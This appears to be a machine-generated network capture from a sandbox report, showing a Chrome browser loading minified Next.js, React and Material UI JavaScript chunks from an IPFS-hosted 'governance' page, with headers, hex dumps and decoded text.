                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:56 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 57798
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifsdl4lcp3ktsyksdcd3ijhxwomiycb344uwqmv3uvntnpwozlwwe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7091-73091706560db88e.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifsdl4lcp3ktsyksdcd3ijhxwomiycb344uwqmv3uvntnpwozlwwe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026987
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 36 62 30 65 38 33 63 34 30 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e46b0e83c409-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 30 39 31 5d 2c 7b 35 34 30 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 66 65 74 63 68 3d 21 31 2c 74 68 69 73 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 3d 6e 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 2c 6e 65 77 20 65 7d 28 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7091],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 69 66 28 65 2e 62 6f 64 79 55 73 65 64 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 41 6c 72 65 61 64 79 20 72 65 61 64 22 29 29 3b 65 2e 62 6f 64 79 55 73 65 64 3d 21 30 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 65 2e 72 65 73 75 6c 74 29 7d 2c 65 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 28 65 2e 65 72 72 6f 72 29 7d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 46 69 6c 65 52 65 61 64 65 72 2c 6e 3d
                                                                                                                                                                                                                                                  Data Ascii: this)}function d(e){if(e.bodyUsed)return Promise.reject(new TypeError("Already read"));e.bodyUsed=!0}function f(e){return new Promise((function(t,n){e.onload=function(){t(e.result)},e.onerror=function(){n(e.error)}}))}function y(e){var t=new FileReader,n=
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 20 65 3d 64 28 74 68 69 73 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 42 6c 6f 62 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 74 68 69 73 2e 5f 62 6f 64 79 42 6c 6f 62 29 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 41 72 72 61 79 42 75 66 66 65 72 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6e 65 77 20 42 6c 6f 62 28 5b 74 68 69 73 2e 5f 62 6f 64 79 41 72 72 61 79 42 75 66 66 65 72 5d 29 29 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 46 6f 72 6d 44 61 74 61 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 6f 75 6c 64 20 6e 6f 74 20 72 65 61 64 20 46 6f 72 6d 44 61 74 61 20 62 6f 64 79 20 61 73 20 62 6c 6f 62 22 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69
                                                                                                                                                                                                                                                  Data Ascii: e=d(this);if(e)return e;if(this._bodyBlob)return Promise.resolve(this._bodyBlob);if(this._bodyArrayBuffer)return Promise.resolve(new Blob([this._bodyArrayBuffer]));if(this._bodyFormData)throw new Error("could not read FormData body as blob");return Promi
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 68 69 73 2e 6d 61 70 29 74 68 69 73 2e 6d 61 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 65 2e 63 61 6c 6c 28 74 2c 74 68 69 73 2e 6d 61 70 5b 6e 5d 2c 6e 2c 74 68 69 73 29 7d 2c 70 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 65 2e 70 75 73 68 28 6e 29 7d 29 29 2c 68 28 65 29 7d 2c 70 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74
                                                                                                                                                                                                                                                  Data Ascii: Each=function(e,t){for(var n in this.map)this.map.hasOwnProperty(n)&&e.call(t,this.map[n],n,this)},p.prototype.keys=function(){var e=[];return this.forEach((function(t,n){e.push(n)})),h(e)},p.prototype.values=function(){var e=[];return this.forEach((funct
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 3d 6e 2e 73 68 69 66 74 28 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 2c 72 3d 6e 2e 6a 6f 69 6e 28 22 3d 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 3b 74 2e 61 70 70 65 6e 64 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 29 7d 7d 29 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5c 72 3f 5c 6e 5b 5c 74 20 5d 2b 2f 67 2c 22 20 22 29 2e 73 70 6c 69 74 28 2f 5c 72 3f 5c 6e 2f 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 3a 22 29 2c 69 3d 6e 2e 73 68 69 66 74 28 29 2e 74 72
                                                                                                                                                                                                                                                  Data Ascii: =n.shift().replace(/\+/g," "),r=n.join("=").replace(/\+/g," ");t.append(decodeURIComponent(i),decodeURIComponent(r))}})),t}function I(e){var t=new p;return e.replace(/\r?\n[\t ]+/g," ").split(/\r?\n/).forEach((function(e){var n=e.split(":"),i=n.shift().tr
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 29 7b 76 61 72 20 6f 3d 6e 65 77 20 54 28 65 2c 6e 29 3b 69 66 28 6f 2e 73 69 67 6e 61 6c 26 26 6f 2e 73 69 67 6e 61 6c 2e 61 62 6f 72 74 65 64 29 72 65 74 75 72 6e 20 73 28 6e 65 77 20 74 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 28 22 41 62 6f 72 74 65 64 22 2c 22 41 62 6f 72 74 45 72 72 6f 72 22 29 29 3b 76 61 72 20 61 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 61 2e 61 62 6f 72 74 28 29 7d 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 73 74 61 74 75 73 3a 61 2e 73 74 61 74 75 73 2c 73 74 61 74 75 73 54 65 78 74 3a 61 2e 73 74 61 74 75 73 54 65 78 74 2c 68 65 61 64 65 72 73 3a 49 28 61 2e 67 65 74 41 6c 6c 52 65 73 70
                                                                                                                                                                                                                                                  Data Ascii: se((function(i,s){var o=new T(e,n);if(o.signal&&o.signal.aborted)return s(new t.DOMException("Aborted","AbortError"));var a=new XMLHttpRequest;function c(){a.abort()}a.onload=function(){var e={status:a.status,statusText:a.statusText,headers:I(a.getAllResp
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 33 33 37 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 6e 28 36 37 32 39 34 29 3b 63 6f 6e 73 74 20 72 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 30 20 32 30 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 69 2e 63 72 65 61
                                                                                                                                                                                                                                                  Data Ascii: e.exports=t},33740:function(e,t,n){"use strict";var i=n(67294);const r=i.forwardRef((function(e,t){return i.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),i.crea
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 6f 72 52 65 73 65 74 42 6f 75 6e 64 61 72 79 3a 70 2c 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3a 64 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2c 71 75 65 72 79 3a 66 2e 67 65 74 43 75 72 72 65 6e 74 51 75 65 72 79 28 29 7d 29 29 74 68 72 6f 77 20 79 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 64 2e 6e 6f 74 69 66 79 4f 6e 43 68 61 6e 67 65 50 72 6f 70 73 3f 79 3a 66 2e 74 72 61 63 6b 52 65 73 75 6c 74 28 79 29 7d 7d 2c 35 39 34 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 35 32 39 32 34 29 2c 72 3d 6e 28 39 34 39 39 29 3b 63 6c 61 73 73 20 73 20 65 78 74 65 6e 64 73 20 69
                                                                                                                                                                                                                                                  Data Ascii: orResetBoundary:p,useErrorBoundary:d.useErrorBoundary,query:f.getCurrentQuery()}))throw y.error;return d.notifyOnChangeProps?y:f.trackResult(y)}},59403:function(e,t,n){"use strict";n.d(t,{N:function(){return c}});var i=n(52924),r=n(9499);class s extends i
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 6e 28 37 36 38 37 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 69 3d 28 30 2c 6f 2e 5f 76 29 28 65 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 72 29 28 69 2c 73 29 7d 7d 2c 33 36 34 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 33 32 31 36 31 29 2c 72 3d 6e 28 35 32 39 32 34 29 2c 73 3d 6e 28 37 36 38 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 6f 3d 28 30 2c 69 2e 5f 76 29 28 65 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 72 29 28 6f 2c 72 2e 7a 29 7d 7d 2c 38 30 31 30 38 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: n(7687);function c(e,t,n){const i=(0,o._v)(e,t,n);return(0,a.r)(i,s)}},36492:function(e,t,n){"use strict";n.d(t,{a:function(){return o}});var i=n(32161),r=n(52924),s=n(7687);function o(e,t,n){const o=(0,i._v)(e,t,n);return(0,s.r)(o,r.z)}},80108:function(e


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  115192.168.2.549840209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC750OUTGET /_next/static/chunks/4609-45f4815a9c085248.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:56 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9409
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidqhky3jsus7dxwolk2ik34d74aqlpigkkkec5zbgecrvxcxdukie"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4609-45f4815a9c085248.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidqhky3jsus7dxwolk2ik34d74aqlpigkkkec5zbgecrvxcxdukie
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026987
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 30 38 63 30 65 37 63 37 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4708c0e7c7e-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1305INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 30 39 5d 2c 7b 38 39 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 38 37 34 36 32 29 2c 6f 3d 6e 28 36 33 33 36 36 29 2c 69 3d 6e 28 36 37 32 39 34 29 2c 73 3d 6e 28 38 36 30 31 30 29 2c 61 3d 6e 28 39 34 37 38 30 29 2c 63 3d 6e 28 38 31 37 31 39 29 2c 6c 3d 6e 28 37 38 38 38 34 29 2c 75 3d 6e 28 33 36 36 32 32 29 2c 66 3d 6e 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4609],{89722:function(e,t,n){"use strict";n.d(t,{Z:function(){return b}});var r=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),u=n(36622),f=n(34867);function p(e){return(
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 61 62 6c 65 64 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 69 6e 68 65 72 69 74 3a 76 6f 69 64 20 30 7d 5b 74 2e 63 6f 6c 6f 72 5d 7d 29 29 29 2c 68 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 6c 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 49 63 6f 6e 22 7d 29 2c 7b 62 61 73 65 43 6c 61 73 73 4e 61 6d 65 3a 69 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 63 2c 63 6f 6c 6f 72 3a 66 3d 22 69 6e 68 65 72 69 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 68 3d 22 73 70 61 6e 22 2c 66 6f 6e 74 53 69 7a 65 3a 62 3d 22 6d 65 64 69 75 6d 22 7d 3d 6e 2c 79 3d 28 30 2c 6f
                                                                                                                                                                                                                                                  Data Ascii: abled:(e.vars||e).palette.action.disabled,inherit:void 0}[t.color]}))),h=i.forwardRef((function(e,t){const n=(0,l.Z)({props:e,name:"MuiIcon"}),{baseClassName:i="material-icons",className:c,color:f="inherit",component:h="span",fontSize:b="medium"}=n,y=(0,o
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 28 28 28 74 2c 6e 29 3d 3e 28 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 73 70 61 63 69 6e 67 26 26 6e 75 6c 6c 21 3d 65 2e 73 70 61 63 69 6e 67 5b 6e 5d 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 64 69 72 65 63 74 69 6f 6e 26 26 6e 75 6c 6c 21 3d 65 2e 64 69 72 65 63 74 69 6f 6e 5b 6e 5d 29 26 26 28 74 5b 6e 5d 3d 21 30 29 2c 74 29 29 2c 7b 7d 29 2c 69 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 61 73 65 3a 6f 7d 29 2c 63 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 73 70 61 63 69 6e 67 2c 62 61 73 65 3a 6f 7d 29 3b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 69 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 66 6f 72 45 61 63 68 28 28
                                                                                                                                                                                                                                                  Data Ascii: (((t,n)=>(("object"===typeof e.spacing&&null!=e.spacing[n]||"object"===typeof e.direction&&null!=e.direction[n])&&(t[n]=!0),t)),{}),i=(0,s.P$)({values:e.direction,base:o}),c=(0,s.P$)({values:e.spacing,base:o});"object"===typeof i&&Object.keys(i).forEach((
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 72 20 72 3d 6e 28 36 32 37 30 35 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 3d 6f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 73 3d 6f 2e 74 6f 53 74 72 69 6e 67 2c 61 3d 72 3f 72 2e 74 6f 53 74 72 69 6e 67 54 61 67 3a 76 6f 69 64 20 30 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 61 6c 6c 28 65 2c 61 29 2c 6e 3d 65 5b 61 5d 3b 74 72 79 7b 65 5b 61 5d 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 21 30 7d 63 61 74 63 68 28 63 29 7b 7d 76 61 72 20 6f 3d 73 2e 63 61 6c 6c 28 65 29 3b 72 65 74 75 72 6e 20 72 26 26 28 74 3f 65 5b 61 5d 3d 6e 3a 64 65 6c 65 74 65 20 65 5b 61 5d 29 2c 6f 7d 7d 2c 32 33 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 70
                                                                                                                                                                                                                                                  Data Ascii: r r=n(62705),o=Object.prototype,i=o.hasOwnProperty,s=o.toString,a=r?r.toStringTag:void 0;e.exports=function(e){var t=i.call(e,a),n=e[a];try{e[a]=void 0;var r=!0}catch(c){}var o=s.call(e);return r&&(t?e[a]=n:delete e[a]),o}},2333:function(e){var t=Object.p
